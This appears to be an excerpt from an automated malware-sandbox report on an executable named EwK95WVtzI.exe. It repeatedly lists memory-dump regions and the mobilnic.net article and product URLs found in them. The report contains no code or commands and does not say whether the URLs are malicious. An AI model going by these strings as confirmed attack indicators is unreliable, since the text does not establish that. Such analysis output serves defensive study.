                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1648
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1649
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1650
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1766
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1869
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1879
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1883
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1884
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1885
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/article/show_article.php?id=1886
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/e
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=4
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=63
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=64
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=65
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=66
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/product.php?id=73
